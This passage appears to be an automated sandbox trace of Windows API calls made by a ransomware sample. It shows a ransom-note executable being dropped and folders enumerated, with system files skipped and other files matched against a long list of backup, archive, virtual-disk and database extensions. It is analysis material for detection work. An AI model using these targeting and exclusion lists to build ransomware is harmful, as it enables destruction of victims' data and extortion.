hHeap=0x2b0000) returned 1 [0056.208] lstrlenW (lpString="C:\\Users\\Public\\Libraries") returned 25 [0056.208] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Libraries" | out: lpString1="C:\\Users\\Public\\Libraries") returned="C:\\Users\\Public\\Libraries" [0056.208] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.208] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Libraries\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\libraries\\how to back your files.exe"), bFailIfExists=1) returned 0 [0056.209] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0056.210] GetLastError () returned 0x0 [0056.210] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0056.210] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0056.211] CloseHandle (hObject=0x154) returned 1 [0056.211] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0056.211] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.211] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Libraries\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49817020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49817020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cce28 [0056.211] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.212] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.212] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0056.212] FindNextFileW (in: hFindFile=0x2cce28, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49817020, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49817020, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.213] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.213] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0056.213] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0056.213] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0056.213] FindNextFileW (in: hFindFile=0x2cce28, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2839e1d0, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2839e1d0, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288f9359, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0056.213] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.213] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0056.214] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0056.215] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0056.218] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0056.219] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0056.220] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0056.221] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0056.222] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0056.223] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0056.223] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0056.223] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0056.223] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0056.223] lstrlenW (lpString="desktop.ini") returned 11 [0056.223] lstrlenW (lpString="C:\\Users\\Public\\Libraries\\*") returned 27 [0056.223] lstrcpyW (in: lpString1=0x2cce434, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0056.223] lstrlenW (lpString="desktop.ini") returned 11 [0056.223] lstrlenW (lpString="Ares865") returned 7 [0056.223] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0056.223] lstrlenW (lpString=".dll") returned 4 [0056.223] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0056.223] lstrlenW (lpString=".lnk") returned 4 [0056.225] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0056.225] lstrlenW (lpString=".ini") returned 4 [0056.226] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0056.227] lstrlenW (lpString=".sys") returned 4 [0056.227] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0056.228] lstrlenW (lpString="desktop.ini") returned 11 [0056.228] lstrlenW (lpString="bak") returned 3 [0056.228] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0056.228] lstrlenW (lpString="ba_") returned 3 [0056.228] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0056.228] lstrlenW (lpString="dbb") returned 3 [0056.228] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0056.228] lstrlenW (lpString="vmdk") returned 4 [0056.228] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0056.228] lstrlenW (lpString="rar") returned 3 [0056.229] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0056.229] lstrlenW (lpString="zip") returned 3 [0056.229] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0056.229] lstrlenW (lpString="tgz") returned 3 [0056.229] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0056.229] lstrlenW (lpString="vbox") returned 4 [0056.229] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0056.233] lstrlenW (lpString="vdi") returned 3 [0056.234] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0056.234] lstrlenW (lpString="vhd") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0056.235] lstrlenW (lpString="vhdx") returned 4 [0056.235] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0056.235] lstrlenW (lpString="avhd") returned 4 [0056.235] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0056.235] lstrlenW (lpString="db") returned 2 [0056.235] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0056.235] lstrlenW (lpString="db2") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0056.235] lstrlenW (lpString="db3") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0056.235] lstrlenW (lpString="dbf") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0056.235] lstrlenW (lpString="mdf") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0056.235] lstrlenW (lpString="mdb") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0056.235] lstrlenW (lpString="sql") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0056.235] lstrlenW (lpString="sqlite") returned 6 [0056.235] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0056.235] lstrlenW (lpString="sqlite3") returned 7 [0056.235] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0056.235] lstrlenW (lpString="sqlitedb") returned 8 [0056.235] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0056.235] lstrlenW (lpString="xml") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0056.235] lstrlenW (lpString="$er") returned 3 [0056.235] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0056.236] lstrlenW (lpString="4dd") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0056.236] lstrlenW (lpString="4dl") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0056.236] lstrlenW (lpString="^^^") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0056.236] lstrlenW (lpString="abs") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0056.236] lstrlenW (lpString="abx") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0056.236] lstrlenW (lpString="accdb") returned 5 [0056.236] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0056.236] lstrlenW (lpString="accdc") returned 5 [0056.236] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0056.236] lstrlenW (lpString="accde") returned 5 [0056.236] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0056.236] lstrlenW (lpString="accdr") returned 5 [0056.236] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0056.236] lstrlenW (lpString="accdt") returned 5 [0056.236] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0056.236] lstrlenW (lpString="accdw") returned 5 [0056.236] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0056.236] lstrlenW (lpString="accft") returned 5 [0056.236] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0056.236] lstrlenW (lpString="adb") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0056.236] lstrlenW (lpString="adb") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0056.236] lstrlenW (lpString="ade") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0056.236] lstrlenW (lpString="adf") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0056.236] lstrlenW (lpString="adn") returned 3 [0056.236] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0056.236] lstrlenW (lpString="adp") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0056.237] lstrlenW (lpString="alf") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0056.237] lstrlenW (lpString="ask") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0056.237] lstrlenW (lpString="btr") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0056.237] lstrlenW (lpString="cat") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0056.237] lstrlenW (lpString="cdb") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0056.237] lstrlenW (lpString="ckp") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0056.237] lstrlenW (lpString="cma") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0056.237] lstrlenW (lpString="cpd") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0056.237] lstrlenW (lpString="dacpac") returned 6 [0056.237] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0056.237] lstrlenW (lpString="dad") returned 3 [0056.237] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0056.237] lstrlenW (lpString="dadiagrams") returned 10 [0056.237] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0056.237] lstrlenW (lpString="daschema") returned 8 [0056.237] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0056.237] lstrlenW (lpString="db-journal") returned 10 [0056.237] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0056.237] lstrlenW (lpString="db-shm") returned 6 [0056.237] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0056.237] lstrlenW (lpString="db-wal") returned 6 [0056.237] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0056.237] lstrlenW (lpString="dbc") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0056.238] lstrlenW (lpString="dbs") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0056.238] lstrlenW (lpString="dbt") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0056.238] lstrlenW (lpString="dbv") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0056.238] lstrlenW (lpString="dbx") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0056.238] lstrlenW (lpString="dcb") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0056.238] lstrlenW (lpString="dct") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0056.238] lstrlenW (lpString="dcx") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0056.238] lstrlenW (lpString="ddl") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0056.238] lstrlenW (lpString="dlis") returned 4 [0056.238] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0056.238] lstrlenW (lpString="dp1") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0056.238] lstrlenW (lpString="dqy") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0056.238] lstrlenW (lpString="dsk") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0056.238] lstrlenW (lpString="dsn") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0056.238] lstrlenW (lpString="dtsx") returned 4 [0056.238] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0056.238] lstrlenW (lpString="dxl") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0056.238] lstrlenW (lpString="eco") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0056.238] lstrlenW (lpString="ecx") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0056.238] lstrlenW (lpString="edb") returned 3 [0056.238] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0056.238] lstrlenW (lpString="epim") returned 4 [0056.239] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0056.239] lstrlenW (lpString="fcd") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0056.239] lstrlenW (lpString="fdb") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0056.239] lstrlenW (lpString="fic") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0056.239] lstrlenW (lpString="flexolibrary") returned 12 [0056.239] lstrlenW (lpString="fm5") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0056.239] lstrlenW (lpString="fmp") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0056.239] lstrlenW (lpString="fmp12") returned 5 [0056.239] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0056.239] lstrlenW (lpString="fmpsl") returned 5 [0056.239] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0056.239] lstrlenW (lpString="fol") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0056.239] lstrlenW (lpString="fp3") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0056.239] lstrlenW (lpString="fp4") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0056.239] lstrlenW (lpString="fp5") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0056.239] lstrlenW (lpString="fp7") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0056.239] lstrlenW (lpString="fpt") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0056.239] lstrlenW (lpString="frm") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0056.239] lstrlenW (lpString="gdb") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0056.239] lstrlenW (lpString="gdb") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0056.239] lstrlenW (lpString="grdb") returned 4 [0056.239] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0056.239] lstrlenW (lpString="gwi") returned 3 [0056.239] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0056.239] lstrlenW (lpString="hdb") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0056.240] lstrlenW (lpString="his") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0056.240] lstrlenW (lpString="ib") returned 2 [0056.240] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0056.240] lstrlenW (lpString="idb") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0056.240] lstrlenW (lpString="ihx") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0056.240] lstrlenW (lpString="itdb") returned 4 [0056.240] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0056.240] lstrlenW (lpString="itw") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0056.240] lstrlenW (lpString="jet") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0056.240] lstrlenW (lpString="jtx") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0056.240] lstrlenW (lpString="kdb") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0056.240] lstrlenW (lpString="kexi") returned 4 [0056.240] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0056.240] lstrlenW (lpString="kexic") returned 5 [0056.240] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0056.240] lstrlenW (lpString="kexis") returned 5 [0056.240] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0056.240] lstrlenW (lpString="lgc") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0056.240] lstrlenW (lpString="lwx") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0056.240] lstrlenW (lpString="maf") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0056.240] lstrlenW (lpString="maq") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0056.240] lstrlenW (lpString="mar") returned 3 [0056.240] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0056.240] lstrlenW (lpString="marshal") returned 7 [0056.240] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0056.240] lstrlenW (lpString="mas") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0056.241] lstrlenW (lpString="mav") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0056.241] lstrlenW (lpString="maw") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0056.241] lstrlenW (lpString="mdbhtml") returned 7 [0056.241] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0056.241] lstrlenW (lpString="mdn") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0056.241] lstrlenW (lpString="mdt") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0056.241] lstrlenW (lpString="mfd") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0056.241] lstrlenW (lpString="mpd") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0056.241] lstrlenW (lpString="mrg") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0056.241] lstrlenW (lpString="mud") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0056.241] lstrlenW (lpString="mwb") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0056.241] lstrlenW (lpString="myd") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0056.241] lstrlenW (lpString="ndf") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0056.241] lstrlenW (lpString="nnt") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0056.241] lstrlenW (lpString="nrmlib") returned 6 [0056.241] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0056.241] lstrlenW (lpString="ns2") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0056.241] lstrlenW (lpString="ns3") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0056.241] lstrlenW (lpString="ns4") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0056.241] lstrlenW (lpString="nsf") returned 3 [0056.241] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0056.241] lstrlenW (lpString="nv") returned 2 [0056.242] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0056.242] lstrlenW (lpString="nv2") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0056.242] lstrlenW (lpString="nwdb") returned 4 [0056.242] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0056.242] lstrlenW (lpString="nyf") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0056.242] lstrlenW (lpString="odb") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0056.242] lstrlenW (lpString="odb") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0056.242] lstrlenW (lpString="oqy") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0056.242] lstrlenW (lpString="ora") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0056.242] lstrlenW (lpString="orx") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0056.242] lstrlenW (lpString="owc") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0056.242] lstrlenW (lpString="p96") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0056.242] lstrlenW (lpString="p97") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0056.242] lstrlenW (lpString="pan") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0056.242] lstrlenW (lpString="pdb") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0056.242] lstrlenW (lpString="pdm") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0056.242] lstrlenW (lpString="pnz") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0056.242] lstrlenW (lpString="qry") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0056.242] lstrlenW (lpString="qvd") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0056.242] lstrlenW (lpString="rbf") returned 3 [0056.242] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0056.242] lstrlenW (lpString="rctd") returned 4 [0056.243] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0056.243] lstrlenW (lpString="rod") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0056.243] lstrlenW (lpString="rodx") returned 4 [0056.243] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0056.243] lstrlenW (lpString="rpd") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0056.243] lstrlenW (lpString="rsd") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0056.243] lstrlenW (lpString="sas7bdat") returned 8 [0056.243] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0056.243] lstrlenW (lpString="sbf") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0056.243] lstrlenW (lpString="scx") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0056.243] lstrlenW (lpString="sdb") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0056.243] lstrlenW (lpString="sdc") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0056.243] lstrlenW (lpString="sdf") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0056.243] lstrlenW (lpString="sis") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0056.243] lstrlenW (lpString="spq") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0056.243] lstrlenW (lpString="te") returned 2 [0056.243] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0056.243] lstrlenW (lpString="teacher") returned 7 [0056.243] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0056.243] lstrlenW (lpString="tmd") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0056.243] lstrlenW (lpString="tps") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0056.243] lstrlenW (lpString="trc") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0056.243] lstrlenW (lpString="trc") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0056.243] lstrlenW (lpString="trm") returned 3 [0056.243] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0056.244] lstrlenW (lpString="udb") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0056.244] lstrlenW (lpString="udl") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0056.244] lstrlenW (lpString="usr") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0056.244] lstrlenW (lpString="v12") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0056.244] lstrlenW (lpString="vis") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0056.244] lstrlenW (lpString="vpd") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0056.244] lstrlenW (lpString="vvv") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0056.244] lstrlenW (lpString="wdb") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0056.244] lstrlenW (lpString="wmdb") returned 4 [0056.244] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0056.244] lstrlenW (lpString="wrk") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0056.244] lstrlenW (lpString="xdb") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0056.244] lstrlenW (lpString="xld") returned 3 [0056.244] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0056.244] lstrlenW (lpString="xmlff") returned 5 [0056.244] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0056.244] wsprintfW (in: param_1=0x2ccd198, 